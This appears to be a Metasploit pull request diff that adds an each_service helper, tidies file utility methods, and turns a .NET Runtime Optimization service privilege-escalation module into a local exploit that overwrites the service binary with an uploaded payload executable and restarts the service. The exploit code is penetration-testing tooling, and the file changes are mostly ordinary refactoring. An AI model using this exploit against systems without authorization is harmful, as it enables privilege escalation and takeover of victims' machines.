### PR TITLE
Add Post::Windows::Services#each_service

### DIFF
--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -3,20 +3,26 @@
 module Msf::Post::File
 
   #
-  # Change directory in the remote session to +path+
+  # Change directory in the remote session to +path+, which may be relative or
+  # absolute.
   #
+  # @return [void]
   def cd(path)
+    e_path = expand_path(path) rescue path
     if session.type == "meterpreter"
-      e_path = session.fs.file.expand_path(path) rescue path
       session.fs.dir.chdir(e_path)
     else
-      session.shell_command_token("cd '#{path}'")
+      session.shell_command_token("cd '#{e_path}'")
     end
   end
 
   #
   # Returns the current working directory in the remote session
   #
+  # @note This may be inaccurate on shell sessions running on Windows before
+  #   XP/2k3
+  #
+  # @return [String]
   def pwd
     if session.type == "meterpreter"
       return session.fs.dir.getwd
@@ -34,6 +40,7 @@ module Msf::Post::File
   #
   # See if +path+ exists on the remote system and is a directory
   #
+  # @param path [String] Remote filename to check
   def directory?(path)
     if session.type == "meterpreter"
       stat = session.fs.file.stat(path) rescue nil
@@ -55,6 +62,7 @@ module Msf::Post::File
   #
   # Expand any environment variables to return the full path specified by +path+.
   #
+  # @return [String]
   def expand_path(path)
     if session.type == "meterpreter"
       return session.fs.file.expand_path(path)
@@ -66,6 +74,7 @@ module Msf::Post::File
   #
   # See if +path+ exists on the remote system and is a regular file
   #
+  # @param path [String] Remote filename to check
   def file?(path)
     if session.type == "meterpreter"
       stat = session.fs.file.stat(path) rescue nil
@@ -92,15 +101,16 @@ module Msf::Post::File
   #
   # Check for existence of +path+ on the remote file system
   #
+  # @param path [String] Remote filename to check
   def exist?(path)
     if session.type == "meterpreter"
       stat = session.fs.file.stat(path) rescue nil
       return !!(stat)
     else
       if session.platform =~ /win/
-         f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
+        f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
       else
-        f = session.shell_command_token("test -e '#{path}' && echo true")
+        f = cmd_exec("test -e '#{path}' && echo true")
       end
 
       return false if f.nil? or f.empty?
@@ -110,30 +120,18 @@ module Msf::Post::File
   end
 
   #
-  # Remove a remote file
-  #
-  def file_rm(file)
-    if session.type == "meterpreter"
-      session.fs.file.rm(file)
-    else
-      if session.platform =~ /win/
-        session.shell_command_token("del \"#{file}\"")
-      else
-        session.shell_command_token("rm -f '#{file}'")
-      end
-    end
-  end
-
-  #
   # Writes a given string to a given local file
   #
-  def file_local_write(file2wrt, data2wrt)
-    if not ::File.exists?(file2wrt)
-      ::FileUtils.touch(file2wrt)
+  # @param local_file_name [String]
+  # @param data [String]
+  # @return [void]
+  def file_local_write(local_file_name, data)
+    unless ::File.exists?(local_file_name)
+      ::FileUtils.touch(local_file_name)
     end
 
-    output = ::File.open(file2wrt, "a")
-    data2wrt.each_line do |d|
+    output = ::File.open(local_file_name, "a")
+    data.each_line do |d|
       output.puts(d)
     end
     output.close
@@ -142,22 +140,27 @@ module Msf::Post::File
   #
   # Returns a MD5 checksum of a given local file
   #
-  def file_local_digestmd5(file2md5)
-    if not ::File.exists?(file2md5)
-      raise "File #{file2md5} does not exists!"
-    else
+  # @param local_file_name [String] Local file name
+  # @return [String] Hex digest of file contents
+  def file_local_digestmd5(local_file_name)
+    if ::File.exists?(local_file_name)
       require 'digest/md5'
       chksum = nil
-      chksum = Digest::MD5.hexdigest(::File.open(file2md5, "rb") { |f| f.read})
+      chksum = Digest::MD5.hexdigest(::File.open(local_file_name, "rb") { |f| f.read})
       return chksum
+    else
+      raise "File #{local_file_name} does not exists!"
     end
   end
 
   #
   # Returns a MD5 checksum of a given remote file
   #
-  def file_remote_digestmd5(file2md5)
-    data = read_file(file2md5)
+  # @note THIS DOWNLOADS THE FILE
+  # @param file_name [String] Remote file name
+  # @return [String] Hex digest of file contents
+  def file_remote_digestmd5(file_name)
+    data = read_file(file_name)
     chksum = nil
     if data
       chksum = Digest::MD5.hexdigest(data)
@@ -168,22 +171,27 @@ module Msf::Post::File
   #
   # Returns a SHA1 checksum of a given local file
   #
-  def file_local_digestsha1(file2sha1)
-    if not ::File.exists?(file2sha1)
-      raise "File #{file2sha1} does not exists!"
-    else
+  # @param local_file_name [String] Local file name
+  # @return [String] Hex digest of file contents
+  def file_local_digestsha1(local_file_name)
+    if ::File.exists?(local_file_name)
       require 'digest/sha1'
       chksum = nil
-      chksum = Digest::SHA1.hexdigest(::File.open(file2sha1, "rb") { |f| f.read})
+      chksum = Digest::SHA1.hexdigest(::File.open(local_file_name, "rb") { |f| f.read})
       return chksum
+    else
+      raise "File #{local_file_name} does not exists!"
     end
   end
 
   #
   # Returns a SHA1 checksum of a given remote file
   #
-  def file_remote_digestsha1(file2sha1)
-    data = read_file(file2sha1)
+  # @note THIS DOWNLOADS THE FILE
+  # @param file_name [String] Remote file name
+  # @return [String] Hex digest of file contents
+  def file_remote_digestsha1(file_name)
+    data = read_file(file_name)
     chksum = nil
     if data
       chksum = Digest::SHA1.hexdigest(data)
@@ -194,22 +202,27 @@ module Msf::Post::File
   #
   # Returns a SHA256 checksum of a given local file
   #
-  def file_local_digestsha2(file2sha2)
-    if not ::File.exists?(file2sha2)
-      raise "File #{file2sha2} does not exists!"
-    else
+  # @param local_file_name [String] Local file name
+  # @return [String] Hex digest of file contents
+  def file_local_digestsha2(local_file_name)
+    if ::File.exists?(local_file_name)
       require 'digest/sha2'
       chksum = nil
-      chksum = Digest::SHA256.hexdigest(::File.open(file2sha2, "rb") { |f| f.read})
+      chksum = Digest::SHA256.hexdigest(::File.open(local_file_name, "rb") { |f| f.read})
       return chksum
+    else
+      raise "File #{local_file_name} does not exists!"
     end
   end
 
   #
   # Returns a SHA2 checksum of a given remote file
   #
-  def file_remote_digestsha2(file2sha2)
-    data = read_file(file2sha2)
+  # @note THIS DOWNLOADS THE FILE
+  # @param file_name [String] Remote file name
+  # @return [String] Hex digest of file contents
+  def file_remote_digestsha2(file_name)
+    data = read_file(file_name)
     chksum = nil
     if data
       chksum = Digest::SHA256.hexdigest(data)
@@ -221,6 +234,8 @@ module Msf::Post::File
   # Platform-agnostic file read.  Returns contents of remote file +file_name+
   # as a String.
   #
+  # @param file_name [String] Remote file name to read
+  # @return [String] Contents of the file
   def read_file(file_name)
     data = nil
     if session.type == "meterpreter"
@@ -236,12 +251,13 @@ module Msf::Post::File
     data
   end
 
-  #
   # Platform-agnostic file write. Writes given object content to a remote file.
-  # Returns Boolean true if successful
   #
   # NOTE: *This is not binary-safe on Windows shell sessions!*
   #
+  # @param file_name [String] Remote file name to write
+  # @param data [String] Contents to put in the file
+  # @return [void]
   def write_file(file_name, data)
     if session.type == "meterpreter"
       fd = session.fs.file.new(file_name, "wb")
@@ -264,6 +280,9 @@ module Msf::Post::File
   #
   # NOTE: *This is not binary-safe on Windows shell sessions!*
   #
+  # @param file_name [String] Remote file name to write
+  # @param data [String] Contents to put in the file
+  # @return [void]
   def append_file(file_name, data)
     if session.type == "meterpreter"
       fd = session.fs.file.new(file_name, "ab")
@@ -283,6 +302,9 @@ module Msf::Post::File
   # Read a local file +local+ and write it as +remote+ on the remote file
   # system
   #
+  # @param remote [String] Destination file name on the remote filesystem
+  # @param local [String] Local file whose contents will be uploaded
+  # @return (see #write_file)
   def upload_file(remote, local)
     write_file(remote, ::File.read(local))
   end
@@ -290,38 +312,46 @@ module Msf::Post::File
   #
   # Delete remote files
   #
+  # @param remote_files [Array<String>] List of remote filenames to
+  #   delete
+  # @return [void]
   def rm_f(*remote_files)
     remote_files.each do |remote|
       if session.type == "meterpreter"
         session.fs.file.delete(remote)
       else
         if session.platform =~ /win/
-          cmd_exec("del /q /f #{remote}")
+          cmd_exec("del /q /f \"#{remote}\"")
         else
-          cmd_exec("rm -f #{remote}")
+          cmd_exec("rm -f '#{remote}'")
         end
       end
     end
   end
+  alias :file_rm :rm_f
 
   #
   # Rename a remote file.
   #
+  # @param old_file [String] Remote file name to move
+  # @param new_file [String] The new name for the remote file
+  # @return [void]
   def rename_file(old_file, new_file)
     if session.respond_to? :commands and session.commands.include?("stdapi_fs_file_move")
       session.fs.file.mv(old_file, new_file)
     else
-        if session.platform =~ /win/
-          cmd_exec(%Q|move /y "#{old_file}" "#{new_file}"|)
-        else
-          cmd_exec(%Q|mv -f "#{old_file}" "#{new_file}"|)
-        end
+      if session.platform =~ /win/
+        cmd_exec(%Q|move /y "#{old_file}" "#{new_file}"|)
+      else
+        cmd_exec(%Q|mv -f "#{old_file}" "#{new_file}"|)
+      end
     end
   end
   alias :move_file :rename_file
   alias :mv_file :rename_file
 
 protected
+
   #
   # Meterpreter-specific file read.  Returns contents of remote file
   # +file_name+ as a String or nil if there was an error
@@ -329,11 +359,12 @@ protected
   # You should never call this method directly.  Instead, call {#read_file}
   # which will call this if it is appropriate for the given session.
   #
+  # @return [String]
   def _read_file_meterpreter(file_name)
     begin
       fd = session.fs.file.new(file_name, "rb")
     rescue ::Rex::Post::Meterpreter::RequestError => e
-      print_error("Failed to open file: #{file_name}")
+      print_error("Failed to open file: #{file_name}: #{e}")
       return nil
     end
 
@@ -353,10 +384,11 @@ protected
   #
   # Truncates if +append+ is false, appends otherwise.
   #
-  # You should never call this method directly.  Instead, call #write_file or
-  # #append_file which will call this if it is appropriate for the given
+  # You should never call this method directly.  Instead, call {#write_file}
+  # or {#append_file} which will call this if it is appropriate for the given
   # session.
   #
+  # @return [void]
   def _write_file_unix_shell(file_name, data, append=false)
     redirect = (append ? ">>" : ">")
 
@@ -482,6 +514,7 @@ protected
   #
   # Calculate the maximum line length for a unix shell.
   #
+  # @return [Fixnum]
   def _unix_max_line_length
     # Based on autoconf's arg_max calculator, see
     # http://www.in-ulm.de/~mascheck/various/argmax/autoconf_check.html

--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
@@ -203,10 +203,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
     alias delete rm
   end
 
-        #
-        # Performs a rename from oldname to newname
-        #
-        def File.mv(oldname, newname)
+  #
+  # Performs a rename from oldname to newname
+  #
+  def File.mv(oldname, newname)
     request = Packet.create_request('stdapi_fs_file_move')
 
     request.add_tlv(TLV_TYPE_FILE_NAME, client.unicode_filter_decode( oldname ))
@@ -215,12 +215,12 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
     response = client.send_request(request)
 
     return response
-        end
+  end
 
-        class << self
-                alias move mv
-                alias rename mv
-        end
+  class << self
+    alias move mv
+    alias rename mv
+  end
 
   #
   # Upload one or more files to the remote remote directory supplied in

--- a/modules/exploits/windows/local/net_runtime_modify.rb
+++ b/modules/exploits/windows/local/net_runtime_modify.rb
@@ -6,45 +6,45 @@
 require 'msf/core'
 require 'rex'
 
-class Metasploit3 < Msf::Post
+class Metasploit3 < Msf::Exploit::Local
 
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
   include Msf::Post::Windows::Services
-  include Msf::Module::Deprecated
-
-  deprecated "2014-05-18", "exploit/windows/local/net_runtime_modify"
+  include Msf::Post::File
 
   def initialize(info={})
     super( update_info( info,
       'Name'          => 'Windows Escalate Microsoft .NET Runtime Optimization Service Privilege Escalation',
       'Description'   => %q{
-        This module attempts to exploit the security permissions set on the .NET Runtime
-      Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0.
-      The permissions on this service allow domain users and local power users to modify
-      the mscorsvw.exe binary.
+        This module attempts to exploit the security permissions set on
+        the .NET Runtime Optimization service. Vulnerable versions of
+        the .NET Framework include 4.0 and 2.0.  The permissions on this
+        service allow domain users and local power users to modify the
+        mscorsvw.exe binary.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'bannedit' ],
       'Platform'      => [ 'win' ],
+      'Targets'       => [ [ 'Windows', { } ], ],
+      'DefaultTarget' => 0,
       'SessionTypes'  => [ 'meterpreter' ],
       'References'    =>
         [
           [ 'OSVDB', '71013' ],
           [ 'EDB', '16940' ]
-        ]
+        ],
+      'DisclosureDate' => 'Mar 08 2011'
     ))
-
-    register_options([
-      OptAddress.new("LHOST", [ false, "Listener IP address for the new session" ]),
-      OptPort.new("LPORT", [ false, "Listener port for the new session", 4444 ]),
-    ])
 
   end
 
-  def run
+  def exploit
     paths = []
-    candidate_services = []
+    stopped_services = []
     vuln = ""
-    @temp = session.fs.file.expand_path("%TEMP%")
+    @temp = expand_path("%TEMP%")
 
     if init_railgun() == :error
       return
@@ -54,13 +54,14 @@ class Metasploit3 < Msf::Post
     print_status("This may take a few minutes.")
     # enumerate the installed .NET versions
     each_service do |service|
+      vprint_status("Checking '#{service}'")
       if service =~ /clr_optimization_.*/
         info = service_info(service)
         paths << info['Command']
-        candidate_services << service
+        stopped_services << service
+        print_status("Found #{info['Name']} installed")
         begin
           service_stop(service) # temporarily stop the service
-          print_status("Found #{info['Name']} installed")
         rescue
           print_error("We do not appear to have access to stop #{info['Name']}")
         end
@@ -83,13 +84,9 @@ class Metasploit3 < Msf::Post
       payload = setup_exploit
     end
 
-    candidate_services.each do |service|
+    stopped_services.each do |service|
       session.railgun.kernel32.CopyFileA(payload, vuln, false)
-      mng = session.railgun.advapi32.OpenSCManagerA(nil,nil,1)
-      if mng['return'].nil?
-        print_error("Cannot open service manager, not enough privileges")
-        return
-      end
+
       # restart the service
       status = service_start(service)
 
@@ -119,10 +116,10 @@ class Metasploit3 < Msf::Post
 
   def init_railgun
     begin
-    rg = session.railgun
-    if (!rg.get_dll('advapi32'))
-      rg.add_dll('advapi32')
-    end
+      rg = session.railgun
+      if (!rg.get_dll('advapi32'))
+        rg.add_dll('advapi32')
+      end
     rescue Exception => e
       print_error("Could not initalize railgun")
       print_error("Railgun Error: #{e}")
@@ -131,48 +128,20 @@ class Metasploit3 < Msf::Post
   end
 
   def setup_exploit
-    lhost = datastore["LHOST"] || Rex::Socket.source_address
-    lport = datastore["LPORT"] || 4444
-    p_mod = datastore['PAYLOAD'] || "windows/meterpreter/reverse_tcp"
     file  = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
 
-    payload = session.framework.payloads.create(p_mod)
-    payload.datastore['LHOST'] = lhost
-    payload.datastore['LPORT'] = lport
+    exe = generate_payload_exe_service
+    print_status("Uploading payload #{file} executable to temp directory")
+    # Upload the payload to the filesystem
+    file = @temp + "\\" + file
+    print_status("Writing #{file}...")
 
-    exe = Msf::Util::EXE.to_win32pe_service(session.framework, payload.generate)
     begin
-      print_status("Uploading payload #{file} executable to temp directory")
-      # Upload the payload to the filesystem
-      file = @temp + "\\" + file
-      fd = session.fs.file.new(file, "wb")
-      print_status("Writing #{file}...")
-      fd.write(exe)
-      fd.close
+      write_file(file, exe)
     rescue Exception => e
       print_error("Error uploading file #{file}: #{e.class} #{e}")
       return
     end
-
-    print_status("Setting up multi/handler...")
-    print_status("Using Payload #{p_mod}...")
-    handler = session.framework.exploits.create("multi/handler")
-    handler.register_parent(self)
-    handler.datastore['PAYLOAD'] = p_mod
-    handler.datastore['LHOST']   = lhost
-    handler.datastore['LPORT']   = lport
-    handler.datastore['InitialAutoRunScript'] = "migrate -f"
-    handler.datastore['ExitOnSession'] = true
-    handler.datastore['ListenerTimeout'] = 300
-    handler.datastore['ListenerComm'] = 'local'
-
-    # handler.exploit_module = self
-    handler.exploit_simple(
-      'LocalInput'  => self.user_input,
-      'LocalOutput' => self.user_output,
-      'Payload'  => handler.datastore['PAYLOAD'],
-      'RunAsJob' => true
-    )
 
     print_status("Upload complete")
     return file

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Local
     #Search through list of services to find weak permissions, whether file or config
     serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
     #for each service
-    service_list.each do |serv|
+    each_service do |serv|
       begin
         srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
         if srvtype != "16"

--- a/modules/exploits/windows/local/trusted_service_path.rb
+++ b/modules/exploits/windows/local/trusted_service_path.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Local
   def enum_vuln_services(quick=false)
     vuln_services = []
 
-    service_list.each do |name|
+    each_service do |name|
       info = service_info(name)
 
       # Sometimes there's a null byte at the end of the string,

--- a/modules/post/windows/gather/enum_services.rb
+++ b/modules/post/windows/gather/enum_services.rb
@@ -15,12 +15,14 @@ class Metasploit3 < Msf::Post
     super(update_info(info,
       'Name'                 => "Windows Gather Service Info Enumeration",
       'Description'          => %q{
-        This module will query the system for services and display name and configuration
-        info for each returned service. It allows you to optionally search the credentials, path, or start
-        type for a string and only return the results that match. These query operations
-        are cumulative and if no query strings are specified, it just returns all services.
-        NOTE: If the script hangs, windows firewall is most likely on and you did not
-        migrate to a safe process (explorer.exe for example).
+        This module will query the system for services and display name and
+        configuration info for each returned service. It allows you to
+        optionally search the credentials, path, or start type for a string
+        and only return the results that match. These query operations are
+        cumulative and if no query strings are specified, it just returns all
+        services.  NOTE: If the script hangs, windows firewall is most likely
+        on and you did not migrate to a safe process (explorer.exe for
+        example).
         },
       'License'              => MSF_LICENSE,
       'Platform'             => ['win'],
@@ -39,53 +41,55 @@ class Metasploit3 < Msf::Post
   def run
 
     # set vars
-    qcred = datastore["CRED"] || nil
-    qpath = datastore["PATH"] || nil
+    qcred = datastore["CRED"]
+    qpath = datastore["PATH"]
+
+    if qcred
+      qcred = qcred.downcase
+      print_status("Credential Filter: " + qcred)
+    end
+
+    if qpath
+      qpath = qpath.downcase
+      print_status("Executable Path Filter: " + qpath)
+    end
+
     if datastore["TYPE"] == "All"
       qtype = nil
     else
-      qtype = datastore["TYPE"]
-    end
-    if qcred
-      print_status("Credential Filter: " + qcred)
-    end
-    if qpath
-      print_status("Executable Path Filter: " + qpath)
-    end
-    if qtype
+      qtype = datastore["TYPE"].downcase
       print_status("Start Type Filter: " + qtype)
     end
 
-    print_status("Listing Service Info for matching services:")
-    service_list.each do |sname|
+    print_status("#{session.session_host} - Listing Service Info for matching services:")
+    each_service do |sname|
       srv_conf = {}
-      isgood = true
-      #make sure we got a service name
+
+      # make sure we got a service name
       if sname
         begin
           srv_conf = service_info(sname)
-          #filter service based on filters passed, the are cumulative
-          if qcred and ! srv_conf['Credentials'].downcase.include? qcred.downcase
-            isgood = false
-          end
-          if qpath and ! srv_conf['Command'].downcase.include? qpath.downcase
-            isgood = false
-          end
-          # There may not be a 'Startup', need to check nil
-          if qtype and ! (srv_conf['Startup'] || '').downcase.include? qtype.downcase
-            isgood = false
-          end
-
-          #if we are still good return the info
-          if isgood
-            vprint_status("\tName: #{sname}")
-            vprint_good("\t\tStartup: #{srv_conf['Startup']}")
-            vprint_good("\t\tCommand: #{srv_conf['Command']}")
-            vprint_good("\t\tCredentials: #{srv_conf['Credentials']}")
-          end
-        rescue
-          print_error("An error occured enumerating service: #{sname}")
+        rescue => e
+          print_error("Error enumerating service '#{sname}': #{e}")
+          next
         end
+
+        # filter service based on filters passed, they are cumulative
+        if qcred && !srv_conf['Credentials'].downcase.include?(qcred)
+          next
+        end
+        if qpath && !srv_conf['Command'].downcase.include?(qpath)
+          next
+        end
+        # There may not be a 'Startup', need to check nil
+        if qtype && !(srv_conf['Startup'] || '').downcase.include?(qtype)
+          next
+        end
+
+        print_status("\tName: #{sname}")
+        print_good("\t\tStartup: #{srv_conf['Startup']}")
+        print_good("\t\tCommand: #{srv_conf['Command']}")
+        print_good("\t\tCredentials: #{srv_conf['Credentials']}")
       else
         print_error("Problem enumerating services")
       end


### PR DESCRIPTION
Replaces `Post::Windows::Services#service_list`, which gathered all the
services' info from the remote system before returning or printing
anything.

Deprecates post/windows/escalate/net_runtime_modify in favor of a new
shiny local exploit version, exploit/windows/local/net_runtime_modify
